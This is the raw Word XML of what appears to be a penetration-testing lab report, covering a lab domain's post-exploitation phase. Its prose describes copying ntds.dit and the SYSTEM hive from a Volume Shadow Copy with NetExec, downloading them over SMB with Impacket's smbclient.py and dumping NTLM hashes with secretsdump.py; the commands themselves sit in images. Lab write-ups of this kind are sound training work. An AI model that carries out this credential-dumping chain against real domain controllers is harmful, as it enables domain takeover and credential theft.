        <w:t xml:space="preserve">Figure 25: Checking the domain controller for existing Volume Shadow Copies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB35B1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77478E8E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34D3D3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF1167" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B8EC2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE08982" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 26, it shows an attempted extraction of the Active Directory database (ntds.dit) from the domain controller (10.0.10.200) using NetExec (nxc) and compromised credentials CAPSULECORP\testuser1. The attacker first creates a symbolic link (C:\shadow) to a Volume Shadow Copy using the mklink command, aiming to access protected system files. Subsequent commands attempt to list and copy the ntds.dit file from the shadow copy. However, the operations fail due to incorrect file path syntax and the absence or inaccessibility of the targeted shadow copy, resulting in zero files being copied. This demonstrates an attempted but unsuccessful credential extraction from Volume Shadow Copies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730822C1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="295" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC26D92" wp14:editId="4CF269FB">
            <wp:extent cx="5889625" cy="2022983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2937" name="Picture 2937"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2937" name="Picture 2937"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5889625" cy="2022983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A40D9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 25: Accessing the shadow copy and verifying the NTDS database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62068CB0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 26, it shows that the file is copied from the shadow copy location </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30501D32" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(C:\shadow\Windows\NTDS\ntds.dit) to the root of the C: drive (C:\ntds.dit). A follow-up directory listing confirms that the file was successfully copied, demonstrating the ability to access and extract sensitive domain data for further credential dumping and full domain compromise. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7CD82A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD8AA43" wp14:editId="35088B48">
            <wp:extent cx="5943600" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2939" name="Picture 2939"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2939" name="Picture 2939"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1666875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D844C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 26: Copying the ntds.dit file from the shadow copy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649248F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C70B2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C21F9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 27, it shows the extract of the Windows SYSTEM registry hive from the domain controller (10.0.10.200) using  nxc and compromised credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C027F8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CAPSULECORP\testuser1. The output confirms that one file was copied, completing the required data collection for offline credential extraction alongside the previously obtained ntds.dit file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA3F1E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D412D0" wp14:editId="19E27E3F">
            <wp:extent cx="5943600" cy="1369060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3023" name="Picture 3023"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="3023" name="Picture 3023"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1369060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E43CA2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 27: Copying the SYSTEM registry hive from the shadow copy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F711C8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7871F41A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 28, it shows a successful access to the target system (10.0.10.200) using Impacket’s smbclient.py with compromised credentials CAPSULECORP\testuser1. The C$ administrative share and lists directory contents, confirming the presence of both ntds.dit and SYSTEM files. These files are then downloaded using the get command, enabling offline extraction of domain credentials and completing the data exfiltration phase of the attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE9077" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2111F1B5" wp14:editId="487276C8">
            <wp:extent cx="5943600" cy="2066290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3025" name="Picture 3025"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="3025" name="Picture 3025"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2066290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E90B5C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 28: Downloading the ntds.dit and SYSTEM files using smbclient.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54659200" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EF213" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9A836" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876C2E8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F202D52" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In figure 29, it shows a successful offline extraction of domain credentials using Impacket’s secretsdump.py with the previously obtained ntds.dit and SYSTEM hive files. The tool decrypts the Active Directory database and outputs multiple user accounts along with their NTLM password hashes, including privileged accounts such as Administrator. This confirms full compromise of the domain, as the attacker can now use these hashes for pass-the-hash attacks, lateral movement, and complete control over domain resources. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077AA7D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="209" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A43C22D" wp14:editId="447D2B4A">
            <wp:extent cx="5943600" cy="2731135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3080" name="Picture 3080"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="3080" name="Picture 3080"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2731135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D42F16" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="204" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 29: Running secretsdup.py to begin extracting password hashes from the ntds.dit database using the SYSTEM registry hive </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F493E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174998BB" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75032A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D075C2B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67A57A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19441A94" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BC70E9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C448FFC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D547B41" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc30431"/>
      <w:r>
        <w:t xml:space="preserve">Conclusion </w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0D095C1C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overall, these chapters demonstrate how post-exploitation techniques can escalate a small initial compromise into full system or domain control. By maintaining access, harvesting credentials, and leveraging built-in system features, attackers can move through networks and gain higher privileges with minimal detection. This highlights the importance of securing credentials, monitoring system activity, and properly configuring access controls. Understanding these techniques is essential not only for penetration testing but also for strengthening defenses against real-world attacks. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00582E80">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1180" w:bottom="147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5FF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FAC676A"/>
    <w:lvl w:ilvl="0" w:tplc="CB6216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F676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E227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7477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008C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26F4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004B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6ECD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A6EE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5C25A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3656C9EA"/>
    <w:lvl w:ilvl="0" w:tplc="91AAB1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68B8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4011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BE29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9011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D28E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32CF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80F0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AC65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6D12ADB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CC26D1E"/>
    <w:lvl w:ilvl="0" w:tplc="A81A5A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32CC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CA29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20C8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04A2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14FB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E2FE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782C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601D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7664D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="903CDC10"/>
    <w:lvl w:ilvl="0" w:tplc="CA76A7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6EFC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10C7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DA92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A24A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1ABF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980E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84FD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5283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D6C3D80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43F8FC08"/>
    <w:lvl w:ilvl="0" w:tplc="4F6425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EB6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9C6C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800D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DA6E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7E18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F649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F818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34B6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33498839">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1513911213">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="383063168">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1780760083">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2137599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E80"/>
    <w:rsid w:val="00582E80"/>
    <w:rsid w:val="006C3873"/>
    <w:rsid w:val="00DA2B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B4C7F"/>
  <w15:docId w15:val="{06A600F0-4F7B-4F81-8C44-38B61FC7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9" w:lineRule="auto"/>
      <w:ind w:left="10" w:right="7259"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i/>
      <w:color w:val="0F4761"/>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i/>
      <w:color w:val="156082"/>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i/>
      <w:color w:val="15608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56082"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="Heading3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="156082"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="0F4761"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="118" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="25" w:right="266" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="265" w:right="266" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:hidden/>
    <w:pPr>
      <w:spacing w:after="116" w:line="267" w:lineRule="auto"/>
      <w:ind w:left="265" w:right="266"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5978</Words>
  <Characters>34076</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>283</Lines>
  <Paragraphs>79</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39975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Ayaan Hirsi</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Ayaan Hirsi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-20T22:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>